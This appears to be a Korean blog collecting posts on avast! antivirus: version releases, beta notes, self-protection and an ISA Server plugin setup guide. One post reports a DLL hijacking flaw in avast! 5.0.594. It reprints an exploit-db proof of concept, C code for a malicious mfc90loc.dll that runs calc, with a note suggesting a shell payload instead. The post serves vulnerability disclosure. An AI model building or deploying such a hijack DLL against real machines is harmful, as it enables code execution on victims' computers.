어베스트! 안티바이러스 제품이 V7로 메이저 업그레이드되었습니다. 추가되거나 향상된 주요 기능은 다음과 같습니다.

* 클라우드 기반의 파일 평판 시스템을 통한 검사 지원
* 스트리밍 업데이트 지원
* 샌드박스, 오토샌드박스 기능 향상
* 원격 지원
* 안티피싱 등 브라우저 보호 기능 향상
* 새로운 인스톨 프로그램 지원
* 설정 백업 및 복구 지원
* UI 개선
* 화면 보호기 개선
* 윈도우 8 개발자 버전 지원
* 기타 보안 및 안정성 향상

다운로드는 다음과 같습니다.

http://files.avast.com/iavs5x/avast_free_antivirus_setup.exe
http://files.avast.com/iavs5x/avast_pro_antivirus_setup.exe
http://files.avast.com/iavs5x/avast_internet_security_setup.exe

참고로, V6을 사용 중인 경우에는 업데이트를 통해 최신 버전으로 변신할 수 있습니다.

다만, 새로운 버전이므로 아직 알려지지 않은 버그 등이 있을 수 있으므로 가급적이면 경과를 봐가면서 사용하는 것을 추천합니다.

감사합니다.
reTweet
Posted by 문스랩닷컴
blog comments powered by Disqus
    어베스트! V7 버전의 퍼브릭베타 3가 출시되었습니다. 세부 사항은 다음과 같습니다.

    * 새로운 가젯 제공
    * 원격 지원 문제 해결
    * 도움말 및 외국어 지원
    * 등록 지원
    * 계정 설정 기능 지원


    아직까지 해결되지 않은 문제는 다음과 같습니다.

    * FileRep 기능 중지( 2-3일 내에 활성화 예정)
    * 어베스트! 설치 및 업데이트시 문제
    * 계정 설정 기능이 완벽하지 않음
    * 일부 외국어 지원 안함


    다운로드 링크는 다음과 같습니다.

    http://files.avast.com/files/avast7beta/avast_free_antivirus_setup.exe
    http://files.avast.com/files/avast7beta/avast_pro_antivirus_setup.exe
    http://files.avast.com/files/avast7beta/avast_internet_security_setup.exe

    감사합니다.

    PS: 아직 퍼블릭 베타 수준이므로 실제 사용하는 PC에서는 설치하는 것을 추천하지 않습니다. 기존 V6 정식 버전으로도 충분하며, 나중에 V7 정식이 나오면 그 때 이용하십시오.

    끝. 
    reTweet
    Posted by 문스랩닷컴
    blog comments powered by Disqus
      어베스트!의 정식버전(V6.0.1289)이 출시되고 최근에 베타 버전인 V6.0.1352이 출시되었습니다. 정식버전 이후 최초의 베타버전이므로 일부 기능이 추가되었지만, 베타 버전이 올라갈수록 기능이 없어질 수도 있습니다.

      향상된 기능은 다음과 같습니다.
      • 스크립트 방어 - 구글 크롬, 파이어폭스, 아크로뱃 리더에서 동작
      • WebRep 플러그인 - 기능 향상(특히 IE)
      • 자기 방어 모듈(aswSP.sys) - 샌드박스에서 안정성 향샹
      • 파일 방어 - 온클로즈 검사 향상
      • 인터넷 시큐리티 - 새로운 안티스팸 엔진 제공
      • 웹방어, 스크립트 방어: 추가적인 옵션 지원(UI)

      주의: 베타 버전이므로 사용하다가 문제가 발생할 가능성이 있습니다. 따라서, 현재 사용하고 있는 어베스트!가 안정적이라면 업데이트를 하지 않아도 무방합니다.

      감사합니다.



       

      reTweet
      Posted by 문스랩닷컴
      blog comments powered by Disqus
        최근 보안 아니 윈도우 업계를 강타하고 있는 취약점이 바로 DLL Hijacking입니다. DLL은 윈도우 실행파일이 참조하는 라이브러리 파일인데, 문제는 DLL 파일의 경로를 제대로 검증하지 않아 이를 통해 공격을 하는 형태로 이미 예전부터 예견되어 있던 취약점입니다.

        DLL Hijacking 취약점에 대한 자세한 사항은 아래 링크를 참고하시면 금방 이해가 되실 것으로 생각됩니다.


        하여튼, 어베스트! 안티바이러스 제품의 최신 버전에서도 DLL Hijacking 취약점을 가지고 있는 것으로 알려져 있습니다. 어베스트!의 최신 버전은 V5.0.594이며, mfc90loc.dll 파일에서 이 취약점이 존재합니다. mfc90loc.dll은 라이선스 파일에 관련된 DLL 입니다.

        # Exploit Title: avast! license files DLL Hijacking Exploit (mfc90loc.dll)
        # Date: 25/08/2010
        # Author: Bruno Filipe (diwr) http://digitalacropolis.us
        # Software Link: http://www.avast.com <http://www.bsplayer.org>
        # Version: <= 5.0.594
        # Tested on: WinXP SP2, WinXP SP3
        # Thx TheLeader ;)
        #
        ----------------------------------------------------------------------------------------------------------
        # This should work with avast license files (.avastlic)
        # 1. gcc dllmain.c -o mfc90loc.dll
        # 2. Put mfc90ptb.dll in the same directory of an avast license file (EG:
        anything.avastlic)
        # 3. You can generate a msfpayload DLL and spawn a shell, for example.
        #
        ----------------------------------------------------------------------------------------------------------

        #include <windows.h>

        int main()
        {
        WinExec("calc", SW_NORMAL);
        exit(0);
        return 0;
        }

        BOOL WINAPI DllMain(HINSTANCE hinstDLL,DWORD fdwReason, LPVOID lpvReserved)
        {
        main();
        return 0;
        }

        하지만 실제적으로 어베스트!에서는 실시간 감시 및 자기 보호 기능이 월등하기 때문에 이 취약점을 직접적으로 이용하여 공격하기에는 약간 어려운 부분이 있을 수 있습니다만, 그래도 어베스트! 제작사의 빠른 대응이 필요한 시점으로 보입니다.

        감사합니다.

        출처: http://www.exploit-db.com/exploits/14743/


        reTweet
        Posted by 문스랩닷컴
        blog comments powered by Disqus
          지난 1월 22일에, 무료 백신으로 명성을 얻고 있는 어베스트! 안티바이러스의 최신 버전인 V5가 출시되었습니다.

          기존 제품에서는 안티바이러스 라고 하는 범주에 머물렀지만, 신버전에서는 방화벽과 안티스팸이라는 기술이 포함되어 있는 인터넷 슈트 제품이 새롭게 추가되었습니다.

          물로, 무료 제품은 어베스트! 무료 안티바이러스(avast! Free AV)로 명명되어 개인에게는 무료로 계속 제공됩니다.


          감사합니다.

          PS: 제품의 가격은 프로모션 행상로 인해 국내 판매가와 약간 다릅니다.

          reTweet
          Posted by 문스랩닷컴
          blog comments powered by Disqus

            최근 악성 프로그램들은 안티 바이러스가 상주하여 동작함에도 불구하고 감염을 시도하기 위해 오히려 안티바이러스를 공격하여 무력화하는 경향이 새롭게 대두되고 있습니다.


            어베스트! 안티 바이러스 4.8에서 이러한 위협으로부터 보호하기 위하여 자기 보호 모듈을 추가하고 있으며 이에 대한 정보를 간단히 소개합니다.


            어베스트! 환경 설정문제 해결 탭에서는 자기 보호 기능을 사용할지 여부를 결정합니다. 기본적으로 사용하도록 설정되어 있으며 사용자의 선택에 따라 사용하지 않도록 설정할 수 있습니다.

            자기 보호 기능이 동작하는지 확인하려면 서비스 콘솔을 열고 avast! Antivirus 서비스를 강제로 중지시켜 봅니다.

            avast! Antivirus 서비스는 avast! Web SCanneravast! Mail Scanner 서비스를 종속적으로 운영하고 있어 이 서비스도 함께 중지한다는 경고 창이 나타납니다. 를 클릭합니다.

            아래와 같이 avast! 서비스 종료 대화상자가 나타납니다. 를 클릭하면 서비스가 중지됩니다.

            다음에는 루트킷에 대한 정보를 소개할 예정입니다. 많은 기대 바랍니다.

            reTweet
            Posted by 문스랩닷컴
            blog comments powered by Disqus

              ISA Server에서 avast! SE 백신 및 플러그인의 설치 방법에 대해 살펴 봅니다. 먼저 가장 일반적인 ISA Server의 환경을 보면 다음과 같습니다.

               

              사용자 삽입 이미지
              ISA Server를 이용하여 방화벽을 구축한 경우, 내부 사용자들이 인터넷을 사용할 때 대부분 웹 서핑(HTTP 프로토콜), 프로그램 다운로드(FTP 프로토콜), 메신저, 그리고 P2P 프로그램을 주로 사용하게 됩니다. 메신저와 P2P 프로그램은 보통 ISA Server의 방화벽 정책을 허용 또는 차단이 가능한데 반해 HTTP, FTP 프로토콜은 업무상 개방하여 둘 수 밖에 없으며, 이 경로를 통해 바이러스와 웜이 유입될 가능성이 높아지게 됩니다. 따라서, avast! ISA 플러그인을 통해 이러한 목적을 충분히 달성할 수 있습니다.

              avast! SE 및 ISA 플러그인 설치

              1. avast! SE 설치. 설치시, Custom을 선택하고, MS Proxy/ISA Server Plugin을 추가로 선택한 후 설치합니다.

              사용자 삽입 이미지


              2. 라이선스 입력. avast! ISA Server 플러그인은 내부 네트워크에서 ISA Server에 액세스하는 모든 클라이언트 수만큼의 라이선스를 필요로 합니다. 적절한 라이선스 파일을 지정하고 Next 버튼을 클릭합니다.

               

              3.  MS Proxy/ISA Server Settings 대화상자에서는 설치하고자 하는 플러그인의 버전과 설치 폴더를 지정해 줍니다. ISA Server Enterprise Edition이 설치되어 있고 Array(어레이)가 구현된 환경이라면 가운데 있는 체크박스를 선택해야 할 경우도 있습니다. 나머지 과정은 그대로 진행합니다. 설치가 완료되면 재부팅을 합니다.

              사용자 삽입 이미지


              이제 ISA Server 플러그인이 어떻게 설치되어 있는지 확인하고, 설정하는 방법에 대해 설명합니다. 작업 표시줄에서
               @ 모양의 아이콘을 마우스 오른쪽 버튼으로 클릭하고, “On-Access Protection Control을 선택합니다. 왼쪽 항목 중에서 MS Proxy/ISA 프로바이더를 선택하고 오른쪽 세부 화면에서 Customize를 클릭합니다.


              사용자 삽입 이미지



              avast! ISA 플러그인은 HTTP FTP 요청을 필터링할 수 있습니다. 그외 내부로 향하는 요청에 대해서도 필터링이 가능하지만 일반적으로는 외부 요청에 대해서만 필터링을 수행하도록 설정합니다. 또한, 특정 확장자나 MIME 형식을 제외할 수도 있습니다. “Logging” 탭에서는 다양한 수준으로 로그를 지정할 수 있으며 바이러스가 검출된 경우에는 해당 항목을 IIS 로그로 남길 수 있습니다.

               

              이벤트 뷰어(Event Viewer)에서는 Anti-virus라는 별도의 노드를 통해 해당 정보를 자세하게 살펴 볼 수 있습니다. 아래 그림은 내부의 사용자가 어느 사이트에 접속을 시도했는지에 대한 정보를 보여줍니다.


              사용자 삽입 이미지


              로그를 자세하게 저장하게 하는 경우에는 로그 저장 용량이 급격하게 커질 가능성이 있으므로 적절한 설정이 필요합니다. 보통 로그 수준은 Low 수준으로 설정하고 정기적으로 이벤트 로그를 분석합니다.

              ISA Server
              에서는 애플리케이션 필터와 웹 필터를 통해 트래픽을 좀더 세밀하게 제어합니다. avast! 플러그인은 웹 필터에 위치하고 있으며 보통 최상단(필터에는 우선순위가 있습니다)에 위치하게 되며, 실제 ISA Server 콘솔에서는 이 필터의 사용 여부를 결정하는 옵션 이외에 설정할 부분이 없다는 점에서 편리함을 제공해 줍니다.

              사용자 삽입 이미지

              참고: 우선순위는 변경될 수 있습니다.

              어베스트! 안티 바이러스 홈페이지 http://www.avast.co.kr
              reTweet
              Posted by 문스랩닷컴
              blog comments powered by Disqus


                Web Analytics Blogs Directory